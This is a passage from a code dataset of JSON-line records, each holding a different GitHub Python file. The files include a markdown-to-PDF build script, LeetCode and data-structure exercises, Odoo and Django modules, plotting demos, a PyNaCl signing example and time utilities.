headMagData)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"flatronek/vfr-lookout-analysis","sub_path":"wesu-app-data-quality-analysis/head_angle_w_mag_orientated.py","file_name":"head_angle_w_mag_orientated.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"72480829861","text":"\"\"\"Process the markdown files.\nThe purpose of the script is to create a duplicate src directory within which\nall of the markdown files are processed to match the specifications of building\na pdf from multiple markdown files using the pandoc library (***add link to\npandoc library documentation***) with pdf specific text rendering in mind as\nwell.\n\"\"\"\n\nimport os\nimport subprocess\nimport re\nfrom datetime import datetime\n\n\ndef run_shell_cmd(command):\n \"\"\"Run shell/bash commands passed as a string using subprocess module.\"\"\"\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n output = process.stdout.read()\n\n return output.decode('utf-8')\n\n\ndef copy_src():\n \"\"\"Duplicate src directory to a new but temp directory named 'src_copy'.\"\"\"\n # source and target directories\n src_path = \"../src/\"\n target_path = \"src_copy\"\n\n # make new directory\n mkdir_cmd = \"mkdir \"+target_path\n run_shell_cmd(mkdir_cmd)\n\n # copy contents of src directory\n copy_cmd = \"cp -R \"+src_path+\" \"+target_path\n run_shell_cmd(copy_cmd)\n\n\ndef copy_bids_logo():\n \"\"\"Copy BIDS_logo.jpg from the BIDS_logo dir in the root of the repo.\"\"\"\n run_shell_cmd(\"cp ../BIDS_logo/BIDS_logo.jpg src_copy/src/images/\")\n\n\ndef copy_images(root_path):\n \"\"\"Copy images.\n Will be done from images directory of subdirectories to images directory\n in the src directory\n \"\"\"\n subdir_list = []\n\n # walk through the src directory to find subdirectories named 'images'\n # and copy contents to the 'images' directory in the duplicate src \n # directory\n for root, dirs, files in os.walk(root_path):\n if 'images' in dirs:\n subdir_list.append(root)\n\n for each in subdir_list:\n if each != root_path:\n run_shell_cmd(\"cp -R \"+each+\"/images\"+\" \"+root_path+\"/images/\")\n\n\ndef extract_header_string():\n \"\"\"Extract the latest release's version number and date from CHANGES.md.\"\"\"\n released_versions = []\n run_shell_cmd(\"cp ../mkdocs.yml src_copy/\")\n\n with open(os.path.join(os.path.dirname(__file__), 'src_copy/mkdocs.yml'), 'r') as file:\n data = file.readlines()\n\n header_string = data[0].split(\": \")[1]\n \n title = \" \".join(header_string.split()[0:4])\n version_number = header_string.split()[-1]\n build_date = datetime.today().strftime('%Y-%m-%d')\n\n return title, version_number, build_date\n\n\ndef add_header():\n \"\"\"Add the header string extracted from changelog to header.tex file.\"\"\"\n title, version_number, build_date = extract_header_string()\n header = \" \".join([title, version_number, build_date])\n\n # creating a header string with latest version number and date\n header_string = (\"\\chead{ \" + header + \" }\")\n\n with open('header.tex', 'r') as file:\n data = file.readlines()\n\n # now change the last but 2nd line, note that you have to add a newline\n data[-2] = header_string+'\\n'\n\n # re-write header.tex file with new header string\n with open('header.tex', 'w') as file:\n file.writelines(data)\n\n\ndef remove_internal_links(root_path, link_type):\n \"\"\"Find and replace all cross and same markdown internal links.\n The links will be replaced with plain text associated with it.\n \"\"\"\n if link_type == 'cross':\n # regex that matches cross markdown links within a file\n # TODO: add more documentation explaining regex\n primary_pattern = re.compile(r'\\[((?!http).[\\w\\s.\\(\\)`*/–]+)\\]\\(((?!http).+(\\.md|\\.yml|\\.md#[\\w\\-\\w]+))\\)') # noqa: E501\n elif link_type == 'same':\n # regex that matches references sections within the same markdown\n primary_pattern = re.compile(r'\\[([\\w\\s.\\(\\)`*/–]+)\\]\\(([#\\w\\-._\\w]+)\\)')\n\n for root, dirs, files in os.walk(root_path):\n for file in files:\n if file.endswith(\".md\"):\n with open(os.path.join(root, file), 'r') as markdown:\n data = markdown.readlines()\n\n for ind, line in enumerate(data):\n match = primary_pattern.search(line)\n\n if match:\n line = re.sub(primary_pattern,\n match.group().split('](')[0][1:], line)\n\n data[ind] = line\n\n with open(os.path.join(root, file), 'w') as markdown:\n markdown.writelines(data)\n\n\ndef modify_changelog():\n \"\"\"Change first line of the changelog to markdown Heading 1.\n This modification makes sure that in the pdf build, changelog is a new\n chapter.\n \"\"\"\n with open('src_copy/src/CHANGES.md', 'r') as file:\n data = file.readlines()\n\n data[0] = \"# Changelog\"\n\n with open('src_copy/src/CHANGES.md', 'w') as file:\n file.writelines(data)\n\n\ndef edit_titlepage():\n \"\"\"Add title and version number of the specification to the titlepage.\"\"\"\n title, version_number, build_date = extract_header_string()\n\n with open('cover.tex', 'r') as file:\n data = file.readlines()\n\n data[-1] = (\"\\\\textsc{\\large \"+version_number+\"}\" +\n \"\\\\\\\\[0.5cm]\" +\n \"{\\large \" +\n build_date +\n \"}\" +\n \"\\\\\\\\[2cm]\" +\n \"\\\\vfill\" +\n \"\\\\end{titlepage}\")\n\n with open('cover.tex', 'w') as file:\n data = file.writelines(data)\n\n\nif __name__ == '__main__':\n\n duplicated_src_dir_path = 'src_copy/src'\n\n # Step 1: make a copy of the src directory in the current directory\n copy_src()\n\n # Step 2: copy BIDS_logo to images directory of the src_copy directory\n copy_bids_logo()\n\n # Step 3: copy images from subdirectories of src_copy directory\n copy_images(duplicated_src_dir_path)\n subprocess.call(\"mv src_copy/src/images/images/* src_copy/src/images/\", \n shell=True)\n\n # Step 4: extract the latest version number, date and title\n extract_header_string()\n add_header()\n\n edit_titlepage()\n\n # Step 5: modify changelog to be a level 1 heading to facilitate section \n # separation\n modify_changelog()\n\n # Step 6: remove all internal links\n remove_internal_links(duplicated_src_dir_path, 'cross')\n remove_internal_links(duplicated_src_dir_path, 'same')","repo_name":"bendhouseart/yaml_fix","sub_path":"pdf_build_src/process_markdowns.py","file_name":"process_markdowns.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74034130659","text":"\"\"\"\nA sequence of number is called arithmetic if it consists of at least three elements and if the difference between any two consecutive elements is the same.\n\nFor example, these are arithmetic sequence:\n\n1, 3, 5, 7, 9\n7, 7, 7, 7\n3, -1, -5, -9\nThe following sequence is not arithmetic.\n\n1, 1, 2, 5, 7\n\nA zero-indexed array A consisting of N numbers is given. A slice of that array is any pair of integers (P, Q) such that 0 <= P < Q < N.\n\nA slice (P, Q) of array A is called arithmetic if the sequence:\nA[P], A[p + 1], ..., A[Q - 1], A[Q] is arithmetic. In particular, this means that P + 1 < Q.\n\nThe function should return the number of arithmetic slices in the array A.\n\n\nExample:\n\nA = [1, 2, 3, 4]\n\nreturn: 3, for 3 arithmetic slices in A: [1, 2, 3], [2, 3, 4] and [1, 2, 3, 4] itself.\n\"\"\"\n\nclass Solution:\n def numberOfArithmeticSlices(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n # count = 0\n # for s in range(len(A) - 2):\n # dif = A[s + 1] - A[s]\n # for e in range(s + 2, len(A)):\n # if A[e] - A[e - 1] == dif:\n # count += 1\n # else:\n # break\n # return count\n\n # # using dp\n # dp = [0] * len(A)\n # count = 0\n # for i in range(2, len(A)):\n # if A[i] - A[i - 1] == A[i - 1] - A[i - 2]:\n # dp[i] = 1 + dp[i - 1]\n # count += dp[i]\n # return count\n\n #using dp 2\n dp = 0\n count = 0\n for i in range(2, len(A)):\n if A[i] - A[i - 1] == A[i - 1] - A[i - 2]:\n dp = 1 + dp\n count += dp\n else:\n dp = 0\n return count\n\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.numberOfArithmeticSlices([1,2,3,4]))","repo_name":"choupijiang/leetcode","sub_path":"ArithmeticSlices.py","file_name":"ArithmeticSlices.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29730281611","text":"from typing import Generator\nfrom app.db.session import SessionLocal\nfrom app.utils.lists import PaginationParams\n\n\ndef get_database() -> Generator:\n try:\n db = SessionLocal()\n yield db\n finally:\n db.close()\n\n\nclass GetPaginationParams(object):\n def __call__(self, per_page: int = 30, page: int = 1) -> PaginationParams:\n return PaginationParams(per_page=per_page, page=page)\n","repo_name":"stliakis/fastapi-postgres-alembic-cookiecutter","sub_path":"{{cookiecutter.project_slug}}/backend/app/app/api/deps.py","file_name":"deps.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33755242531","text":"class Node():\n\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass LinkedList():\n\n def __init__(self):\n self.head = None\n self.tail = None\n\n def append(self, data):\n new_node = Node(data)\n\n if self.head == None:\n self.head = new_node\n self.tail = self.head\n self.length = 1\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.length += 1\n\n def prepend(self, data):\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n\n self.length += 1\n\n def insert(self, index, data):\n new_node = Node(data)\n i = 0\n temp = self.head\n\n if index >= self.length:\n self.append(data)\n return\n\n if index == 0:\n self.prepend(data)\n\n for i in range(self.length):\n if i == index - 1:\n temp.next, new_node.next = new_node, temp.next\n self.length += 1\n break\n temp = temp.next\n i += 1\n\n def remove(self, index):\n temp = self.head\n i = 0\n\n if index >= self.length:\n print('Entered wrong index')\n\n if index == 0:\n self.head = self.head.next\n self.length -= 1\n return\n\n for i in range(index):\n if i == index - 1:\n temp.next = temp.next.next\n self.length -= 1\n break\n i += 1\n temp = temp.next\n\n\nlist = LinkedList()\nlist.append(10)\nlist.append(5)\nlist.append(6)\nlist.prepend(1)\nlist.insert(2, 99)\nlist.insert(34, 23)\n# list.remove(5)\n","repo_name":"washimimizuku/python-data-structures-and-algorithms","sub_path":"data-structures/linked-lists/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23712436882","text":"# -*- coding: utf-8 -*-\nfrom openerp import fields, models\n\n\nclass WkfCmdSpecialAmountProjectApproval(models.Model):\n _name = 'wkf.cmd.special.amount.project.approval'\n _description = 'Special Amount Project Approval'\n\n doctype_id = fields.Many2one(\n 'wkf.config.doctype',\n string='Document Type',\n required=True,\n )\n employee_id = fields.Many2one(\n 'hr.employee',\n string='Employee',\n required=True,\n )\n amount_min = fields.Float(\n string=\"Minimum\"\n )\n amount_max = fields.Float(\n string=\"Maximum\"\n )\n org_id = fields.Many2one(\n 'res.org',\n string='Org',\n related='employee_id.org_id',\n )\n","repo_name":"ecosoft-odoo/pb2_addons","sub_path":"pabi_workflow/models/wkf_config_project.py","file_name":"wkf_config_project.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"70682325541","text":"import time, base64, urllib, hashlib, hmac, random, sys, re, traceback\nfrom datetime import datetime\n\ndef get_exc_str():\n exc = sys.exc_info()\n exc_tb = ''.join(traceback.format_tb(exc[2]))\n exc_string = \"%s: %s\" % (exc[1].__class__.__name__, unicode(exc[1].message))\n return exc_string\n\ndef generateS3Url(AWS_ACCESS_KEY, AWS_SECRET_KEY, bucket, object_id, timeout = 1200):\n access_key = AWS_ACCESS_KEY\n secret_key = AWS_SECRET_KEY\n expires = time.mktime(time.localtime()) + timeout\n stringToSign = 'GET\\n\\n\\n%d\\n/%s/%s' % (expires,bucket,object_id)\n signature = urllib.quote_plus(base64.encodestring(hmac.new(secret_key,stringToSign,hashlib.sha1).digest()).strip())\n return 'http://s3.amazonaws.com/%s/%s?AWSAccessKeyId=%s&Expires=%d&Signature=%s' % (bucket,object_id,access_key,expires,signature)\n\ndef difftime(then, _abs=False):\n now = strptime()\n delta = now - then\n delta_secs = (delta.days*86400) + delta.seconds + (delta.microseconds/1000000.0)\n if _abs: return abs(delta_secs)\n return delta_secs\n\ndef set_path(d, v, p):\n assert type(p) in (list, tuple)\n assert type(d) in (dict, list, tuple)\n current = d\n for k in p[:-1]:\n current = current[k]\n current[p[-1]] = v\n\ndef get_path(d, p):\n assert type(p) in (list, tuple)\n assert type(d) in (dict, list, tuple)\n current = d\n for k in p[:-1]:\n current = current[k]\n return current[p[-1]]\n\ndef delete_path(d, p):\n assert type(p) in (list, tuple)\n assert type(d) in (dict, list, tuple)\n current = d\n for k in p[:-1]:\n current = current[k]\n del current[p[-1]]\n\ndef generate_object_id(length=8):\n import random\n return u''.join([random.choice('BCDFGHJKLMNPQRSTVWXYZ2345678') for i in xrange(length)])\n\ndef timeit(func, *args, **kwargs):\n t = time.time()\n result = func(*args, **kwargs)\n t = time.time()-t\n return t, 1/t, result\n\ndef slugify(value):\n # slugify from django, taken out for global use\n import unicodedata\n value = unicodedata.normalize('NFKD', unicode(value)).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\w\\s-]', '', value).strip().lower())\n return re.sub('[-\\s]+', '-', value)\n\ndef str_to_attr(s):\n mod, attr = s.rsplit('.',1)\n mod = __import__(mod, {}, {}, [attr])\n return getattr(mod, attr)\n\ndef list_to_callables(l):\n for i in range(len(l)):\n s = l[i]\n if type(s) in (str, unicode):\n l[i] = str_to_attr(s)\n","repo_name":"goswarm/swarm","sub_path":"swarm/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"1367685542","text":"with open('input.txt','r') as INPUT:\r\n lines = INPUT.readlines()\r\n n = int(lines[0])\r\n\r\n result = []\r\n\r\n if n == 1:\r\n result = [1]\r\n elif n == 2:\r\n result = [1, 2]\r\n else:\r\n l = [1, 2]\r\n for i in range(3, n + 1):\r\n l.append(i)\r\n l[i // 2 if i % 2 == 1 else i // 2 - 1], l[-1] = l[-1], l[i // 2 if i % 2 == 1 else i // 2 - 1]\r\n result = l\r\n\r\n with open('output.txt', 'w') as OUTPUT:\r\n OUTPUT.write(' '.join([str(i) for i in result]))","repo_name":"SuperFlanker2014/PADS_Spring_2019","sub_path":"2.3/23v2.py","file_name":"23v2.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4145578629","text":"#!/usr/bin/env python3\n\nimport os, re\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(here, 'README.md')) as f:\n README = f.read()\n\nif __name__ == \"__main__\":\n\n setup(\n name = 'better_kerchunk',\n version = '0.0.1',\n description = 'Better Kerchunk',\n long_description = README,\n classifiers = [],\n author = 'Daniel Westwood',\n author_email = 'daniel.westwood@stfc.ac.uk',\n url = 'https://github.com/cedadev/better_kerchunk',\n keywords = '',\n packages = find_packages(),\n include_package_data = True,\n zip_safe = False,\n install_requires = [],\n )","repo_name":"cedadev/better_kerchunk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1859046353","text":"from __future__ import unicode_literals\n\nimport os\nimport sys\nfrom unittest import TestCase\n\nfrom django.core.apps import app_cache\nfrom django.core.apps.cache import AppCache\nfrom django.test.utils import override_settings\nfrom django.utils._os import upath\n\n\nclass EggLoadingTest(TestCase):\n\n def setUp(self):\n self.old_path = sys.path[:]\n self.egg_dir = '%s/eggs' % os.path.dirname(upath(__file__))\n\n # The models need to be removed after the test in order to prevent bad\n # interactions with the flush operation in other tests.\n self._old_models = app_cache.app_configs['app_loading'].models.copy()\n\n def tearDown(self):\n app_cache.app_configs['app_loading'].models = self._old_models\n app_cache._get_models_cache = {}\n\n sys.path = self.old_path\n\n def test_egg1(self):\n \"\"\"Models module can be loaded from an app in an egg\"\"\"\n egg_name = '%s/modelapp.egg' % self.egg_dir\n sys.path.append(egg_name)\n models = app_cache.load_app('app_with_models')\n self.assertFalse(models is None)\n\n def test_egg2(self):\n \"\"\"Loading an app from an egg that has no models returns no models (and no error)\"\"\"\n egg_name = '%s/nomodelapp.egg' % self.egg_dir\n sys.path.append(egg_name)\n models = app_cache.load_app('app_no_models')\n self.assertTrue(models is None)\n\n def test_egg3(self):\n \"\"\"Models module can be loaded from an app located under an egg's top-level package\"\"\"\n egg_name = '%s/omelet.egg' % self.egg_dir\n sys.path.append(egg_name)\n models = app_cache.load_app('omelet.app_with_models')\n self.assertFalse(models is None)\n\n def test_egg4(self):\n \"\"\"Loading an app with no models from under the top-level egg package generates no error\"\"\"\n egg_name = '%s/omelet.egg' % self.egg_dir\n sys.path.append(egg_name)\n models = app_cache.load_app('omelet.app_no_models')\n self.assertTrue(models is None)\n\n def test_egg5(self):\n \"\"\"Loading an app from an egg that has an import error in its models module raises that error\"\"\"\n egg_name = '%s/brokenapp.egg' % self.egg_dir\n sys.path.append(egg_name)\n self.assertRaises(ImportError, app_cache.load_app, 'broken_app')\n raised = None\n try:\n app_cache.load_app('broken_app')\n except ImportError as e:\n raised = e\n\n # Make sure the message is indicating the actual\n # problem in the broken app.\n self.assertTrue(raised is not None)\n self.assertTrue(\"modelz\" in raised.args[0])\n\n def test_missing_app(self):\n \"\"\"\n Test that repeated app loading doesn't succeed in case there is an\n error. Refs #17667.\n \"\"\"\n app_cache = AppCache()\n # Pretend we're the master app cache to test populate().\n app_cache.master = True\n with override_settings(INSTALLED_APPS=('notexists',)):\n with self.assertRaises(ImportError):\n app_cache.get_model('notexists', 'nomodel', seed_cache=True)\n with self.assertRaises(ImportError):\n app_cache.get_model('notexists', 'nomodel', seed_cache=True)\n\n\nclass GetModelsTest(TestCase):\n def setUp(self):\n from .not_installed import models\n self.not_installed_module = models\n\n def test_get_model_only_returns_installed_models(self):\n self.assertEqual(\n app_cache.get_model(\"not_installed\", \"NotInstalledModel\"), None)\n\n def test_get_model_with_not_installed(self):\n self.assertEqual(\n app_cache.get_model(\n \"not_installed\", \"NotInstalledModel\", only_installed=False),\n self.not_installed_module.NotInstalledModel)\n\n def test_get_models_only_returns_installed_models(self):\n self.assertFalse(\n \"NotInstalledModel\" in\n [m.__name__ for m in app_cache.get_models()])\n\n def test_get_models_with_app_label_only_returns_installed_models(self):\n self.assertEqual(app_cache.get_models(self.not_installed_module), [])\n\n def test_get_models_with_not_installed(self):\n self.assertTrue(\n \"NotInstalledModel\" in [\n m.__name__ for m in app_cache.get_models(only_installed=False)])\n\n\nclass NotInstalledModelsTest(TestCase):\n def test_related_not_installed_model(self):\n from .not_installed.models import NotInstalledModel\n self.assertEqual(\n set(NotInstalledModel._meta.get_all_field_names()),\n set([\"id\", \"relatedmodel\", \"m2mrelatedmodel\"]))\n","repo_name":"eduromo/django","sub_path":"tests/app_loading/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"27169003460","text":"from xml import dom\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\nfrom io import BytesIO\nimport xlsxwriter\nimport base64\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass withholding_record_export(models.TransientModel):\n _name = \"withholding.record\"\n _description = \"Export Excel\"\n\n date_month = fields.Selection(string=\"Mes\", selection=[('01', 'Enero'),\n ('02', 'Febrero'),\n ('03', 'Marzo'),\n ('04', 'Abril'),\n ('05', 'Mayo'),\n ('06', 'Junio'),\n ('07', 'Julio'),\n ('08', 'Agosto'),\n ('09', 'Septiembre'),\n ('10', 'Octubre'),\n ('11', 'Noviembre'),\n ('12', 'Diciembre')])\n date_year = fields.Char(string=\"Año\", size=4)\n\n state = fields.Selection([('choose', 'choose'), ('get', 'get')], default='choose')\n txt_filename = fields.Char('filename', readonly=True)\n txt_binary = fields.Binary('file', readonly=True)\n\n @api.multi\n def generate_file(self):\n\n dominio = [('type', 'like', 'retencion'),\n ('month_year_inv', 'like', self.date_month + \"\" + self.date_year)]\n\n output = BytesIO()\n workbook = xlsxwriter.Workbook(output, {'in_memory': True})\n worksheet = workbook.add_worksheet()\n\n # Data\n # lst_payments = self.env['account.payment'].search([])\n lst_payments = self.env['account.payment'].search(dominio)\n\n # Start from the first cell. Rows and columns are zero indexed.\n row = 0\n col = 0\n\n merge_format = workbook.add_format({\n 'bold': 1,\n 'border': 1,\n 'align': 'center',\n 'valign': 'vcenter',\n 'text_wrap': 1})\n\n border = workbook.add_format({'text_wrap': 1, 'border': 1})\n\n worksheet.merge_range(\"A1:A3\", \"FECHA DE PAGO O RETENCIÓN\", merge_format)\n worksheet.merge_range(\"E1:G1\", \"MONTO DE LA RETRIBUCIÓN\", merge_format)\n worksheet.write(\"A4\", \"(dd/mm/aaaa)\",merge_format)\n worksheet.merge_range(\n \"B1:D1\", \"PERSONA QUE BRINDÓ EL SERVICIO\", merge_format)\n\n worksheet.merge_range(\"B2:B4\", \"TIPO DE DOCUMENTO\", merge_format)\n worksheet.merge_range(\"C2:C4\", \"N° DE DOCUMENTO\", merge_format)\n worksheet.merge_range(\"D2:D4\", \"RAZON SOCIAL\", merge_format)\n worksheet.merge_range(\"E2:E4\", \"MONTO BRUTO\", merge_format)\n worksheet.merge_range(\"F2:F4\", \"RETENCIÓN EFECTUADA\", merge_format)\n worksheet.merge_range(\"G2:G4\", \"MONTO NETO\", merge_format)\n\n row += 4\n\n # worksheet.set_row(0, 35, border)\n worksheet.set_column('A:A', 15)\n worksheet.set_column('D:D', 30)\n\n # Iterador\n for payment in lst_payments:\n # fecha\n fecha = ''\n if payment.payment_date:\n fecha = payment.payment_date.strftime(\"%d/%m/%Y\")\n\n for invoice in payment.invoice_ids:\n worksheet.write(row, col, fecha)\n worksheet.write(row, col + 1, invoice.partner_id.catalog_06_id.name or '')\n worksheet.write(row, col + 2, invoice.partner_id.vat or '')\n worksheet.write(row, col + 3, invoice.partner_id.name or '')\n worksheet.write(row, col + 4, invoice.amount_total or 0)\n worksheet.write(row, col + 5, payment.amount or 0)\n worksheet.write(row, col + 6, invoice.amount_total - payment.amount or 0)\n # worksheet.write(row, col + 7, payment.type or '')\n row += 1\n\n workbook.close()\n output.seek(0)\n\n self.write({\n 'state': 'get',\n 'txt_binary': base64.b64encode(output.getvalue()),\n 'txt_filename': \"retenciones.xlsx\"\n })\n return {\n 'type': 'ir.actions.act_window',\n 'name': 'Export Excel',\n 'res_model': 'withholding.record',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'target': 'new'\n }\n","repo_name":"kit9/DemoClienteVero","sub_path":"sunat/wizard/withholding_record.py","file_name":"withholding_record.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3901721939","text":"import matplotlib.pyplot as plt\nimport numpy as np\nx=np.linspace(0,5,11)\ny=x**2\n# print(x)\n# print(y)\n\n\n#Object Oriented\n\n# fig=plt.figure()\n# axes1=fig.add_axes([0.1,0.1,0.8,0.8])\n# axes1.plot(x,y,\"-r\")\n# axes1.set_title(\"Larger Plot\")\n# axes2=fig.add_axes([0.2,0.5,0.3,0.3])\n# axes2.plot(y,x,\"-b\")\n# axes2.set_title(\"Smaller Plot\")\n# plt.show()\n\n\n#Subplot using object oriented method\n\nfig=plt.figure()\nfig,axes=plt.subplots(nrows=1,ncols=2)\naxes.legend(loc=0)\naxes[0].plot(x,y)\naxes[0].set_title('First Plot')\n\naxes[1].plot(y,x)\naxes[1].set_title('Second Plot')\nplt.show()","repo_name":"Pra9jha/ML","sub_path":"Matplotlib_learning/Object_oriented_method.py","file_name":"Object_oriented_method.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26200716353","text":"import turtle\n\nt=turtle\n\n\nturtle.pencolor('black')\nturtle.pensize(2)\n\nt.fillcolor('yellow')\nt.begin_fill()\n\nturtle.penup()\nturtle.goto(-90,90)\nturtle.pendown()\nturtle.forward(180)\nturtle.goto(-90, -90)\nturtle.left(90)\nturtle.forward(180)\n\nt.end_fill()\n\nt.fillcolor('red')\nt.begin_fill()\n\nt.penup()\nturtle.goto(-90,-90)\nturtle.pendown()\nt.right(90)\nt.forward(180)\nt.left(90)\nt.forward(180)\nt.goto(-90,-90)\nt.end_fill()\nturtle.hideturtle() \n\n\n","repo_name":"jalor2013/pythonstudy","sub_path":"230428/0428作业.py","file_name":"0428作业.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10797865123","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nclass MyCalendarTwo(object):\n\n def __init__(self):\n self.calendar = []\n self.overlap = []\n \n\n def book(self, start, end):\n \"\"\"\n :type start: int\n :type end: int\n :rtype: bool\n \"\"\"\n for s, e in self.overlap:\n if start < e and end > s:\n return False\n \n for s, e in self.calendar:\n if start < e and end > s:\n self.overlap.append([max(start, s), min(end, e)])\n \n self.calendar.append([start, end])\n return True\n\n","repo_name":"Xuan4dream/Leetcode","sub_path":"731_My_Calendar_II.py","file_name":"731_My_Calendar_II.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"46606556100","text":"from nacl.signing import SigningKey\nfrom nacl.encoding import HexEncoder, RawEncoder\nfrom nacl.signing import VerifyKey\nfrom nacl.exceptions import BadSignatureError\nimport pickle\n\ndata_to_sign = 'hello worldd'\nprivate_key_location = './private_key'\n\n# generate private key\n# private_key = SigningKey.generate()\n# f = open(private_key_location, 'wb')\n# pickle.dump(private_key, f)\n# f.close()\n\n# read private key from file\nf = open(private_key_location, 'rb')\nprivate_key = pickle.load(f)\nf.close()\n\n# get public key\npublic_key = private_key.verify_key.encode(encoder=RawEncoder)\n# print(public_key)\npublic_key = bytes.hex(public_key)\n\nprint(public_key)\nprint(len(public_key))\n# print(bytes.fromhex(public_key))\n# exit()\n\n# sign\nsigned_hex = private_key.sign(data_to_sign.encode('utf-8'), encoder=RawEncoder)\nsignature_bytes = RawEncoder.decode(signed_hex.signature)\nsignature = bytes.hex(signature_bytes)\n\n# verify\nverify_key = VerifyKey(bytes.fromhex(public_key), encoder=RawEncoder)\n# signature_bytes = bytes.fromhex(signature)\ntry:\n # print(len(data_to_sign.encode('utf-8')))\n # print(len(bytes.fromhex(signature)))\n verify_key.verify(data_to_sign.encode('utf-8'), bytes.fromhex(signature), encoder=RawEncoder)\n print (\"The message is authentic.\")\nexcept BadSignatureError:\n print (\"The message is not authentic.\")","repo_name":"Min-Qi-Zhang/dotcoin-minicoin","sub_path":"flask-server/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74211165860","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, sys, re\nfrom time import *\nfrom datetime import *\n\n\ndef strflocal(tm=None, format='%Y-%m-%d %H:%M:%S'):\n ''' String from local time\n :param tm: timestamp (seconds or milliseconds)\n :param format: output format\n :return: formatted time string\n '''\n if format == None:\n if tm is None:\n return 'None'\n elif tm == 0:\n return '0'\n else:\n format = '%Y-%m-%d %H:%M:%S'\n\n if tm is None:\n tm = time()\n\n # convert floating point to int/long\n tm = int(tm)\n\n if len(str(tm)) == 13:\n # concvert milliseconds to seconds\n tm = tm/1000\n\n lt = localtime(tm)\n\n return strftime(format, lt)\n\n\ndef localfstr(spec, format=None):\n ''' Local time from string\n :param spec: time specification string\n :param format: format of time string\n :return: unix timestamp (seconds) since 1970, multiply with 1000 for milliseconds\n '''\n\n if format is not None:\n return int(mktime(datetime.strptime(spec, format).timetuple()))\n\n now = datetime.now()\n year = now.year\n month = now.month\n day = now.day\n hour = now.hour\n minute = now.minute\n second = now.second\n delta = 0\n\n _year = None\n\n for token in spec.split():\n\n if token.lower() in ['now', 'heute', 'jetzt']:\n pass\n elif token.lower() in ['yesterday', 'gestern']:\n day = day - 1\n elif token.lower() in ['at', 'vor', 'um']:\n pass\n elif token[:1] == '+' or token[:1] == '-' or token[-1] in 'smhd':\n if token[-1] in 'smhd':\n unit = token[-1]\n token = token[:-1]\n else:\n unit = 's'\n if token[:1] in '+-':\n op = token[:1]\n token = token[1:]\n else:\n op = '-'\n val = float(token.replace(',', '.'))\n delta = int(val * {'s': 1, 'm': 60, 'h': 60*60, 'd': 60*60*24}.get(unit, 's'))\n if op == '-': delta = delta * -1\n elif ':' in token:\n # 13:42[:05]\n tt = token.split(':')\n hour = int(tt[0])\n minute = int(tt[1])\n if len(tt) > 2: second = int(tt[2])\n else: second = 0\n elif '.' in token:\n # 27.9.16\n hour = minute = second = 0\n dt = token.split('.')\n day = int(dt[0])\n month = int(dt[1])\n if len(dt) > 2: _year = dt[2]\n elif '/' in token:\n # 9/27/16\n hour = minute = second = 0\n dt = token.split('/')\n month = int(dt[0])\n day = int(dt[1])\n if len(dt) > 2: _year = dt[2]\n elif '-' in token:\n # 2016-09-27\n hour = minute = second = 0\n dt = token.split('-')\n year = int(dt[0])\n month = int(dt[1])\n day = int(dt[2])\n else:\n # call expression parser\n pass\n\n if _year is not None:\n if len(_year) == 2: _year = str(year)[:2] + _year\n year = int(_year)\n\n return int(mktime(datetime(year, month, day, hour, minute, second).timetuple())) + delta\n","repo_name":"bstrebel/PyUtils","sub_path":"pyutils/timeutils.py","file_name":"timeutils.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"26659092347","text":"# 